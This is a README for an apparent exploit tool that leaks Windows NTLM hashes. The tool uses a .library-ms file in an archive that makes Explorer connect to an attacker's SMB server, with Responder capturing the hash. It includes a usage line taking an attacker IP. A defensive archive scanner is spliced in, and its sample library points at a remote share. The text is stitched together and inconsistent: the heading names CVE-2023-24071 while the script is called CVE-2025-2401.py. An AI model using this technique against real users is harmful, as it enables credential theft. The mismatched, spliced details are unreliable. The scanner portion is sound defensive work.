# CVE-2023-24071 - Windows Explorer NTLM Hash Disclosure
This exploit abuses the way Windows Explorer handles library files (.library-ms) that have been extracted from an archive (.zip, .rar, etc.).
When an archive containing a library file is decompressed, Explorer automatically attempts a connection to the URL specified inside the library.
This means that we can set up Responder and listen for a connection back to our fake SMB server, disclosing the NTLM hash of the user who extracted the archive.
User interaction is required as the archive file must be opened for the connection to be made.
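As an added defensive example (not part of this repository), the scanner below unpacks an archive in memory and flags every `.library-ms` member whose declared location points at a remote share or web URL, i.e. the condition that makes Explorer reach out. The namespace and element names are assumed from Microsoft's public Library Description format; the sample archive and the IP address in it are constructed.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

# Namespace of the Windows Library Description format (assumption: taken from the
# public schema; real .library-ms files are XML documents in this namespace).
LIB_NS = "http://schemas.microsoft.com/windows/2009/library"
# UNC paths and web URLs are the locations that cause an outbound connection.
REMOTE_RE = re.compile(r"^(\\\\|//|https?://|ftp://)", re.I)

# Constructed samples: one library pointing at a remote share, one at a local folder.
REMOTE_LIBRARY = rb"""<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <simpleLocation><url>\\192.0.2.10\share</url></simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>"""
LOCAL_LIBRARY = REMOTE_LIBRARY.replace(rb"\\192.0.2.10\share", rb"C:\Users\Public\Documents")

def remote_locations(library_xml: bytes) -> list[str]:
    """Return every <simpleLocation><url> that points off the local machine."""
    root = ET.fromstring(library_xml)
    urls = ((u.text or "").strip() for u in root.iter(f"{{{LIB_NS}}}url"))
    return [u for u in urls if REMOTE_RE.match(u)]

def scan_zip(zip_bytes: bytes) -> dict[str, list[str]]:
    """Map each .library-ms member of an archive to the remote URLs it declares."""
    hits: dict[str, list[str]] = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if not info.filename.lower().endswith(".library-ms"):
                continue
            try:
                urls = remote_locations(zf.read(info))
            except ET.ParseError:
                urls = ["<malformed library file>"]  # flag it for manual review
            if urls:
                hits[info.filename] = urls
    return hits

def build_sample_zip() -> bytes:
    """Constructed archive: a benign library, a remote-pointing one and a decoy text file."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("docs/Documents.library-ms", LOCAL_LIBRARY)
        zf.writestr("docs/mal.library-ms", REMOTE_LIBRARY)
        zf.writestr("docs/readme.txt", b"nothing to see here")
    return buf.getvalue()

if __name__ == "__main__":
    for member, urls in scan_zip(build_sample_zip()).items():
        print(f"{member}: {urls}")
```

The same check can be run on a mail gateway or on files already extracted to disk; only the `.library-ms` members need parsing.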
# Usage
```
CVE-2025-2401.py -s <attacker IP/domain> -f <output file name>
```

Options:

- `-l <library name>`: renames the library file (default `mal.library-ms`)
# License
GPL v3.0 - as all good software should be
Only with explicit permission from the target system owner.
Remember - don't be a skid :)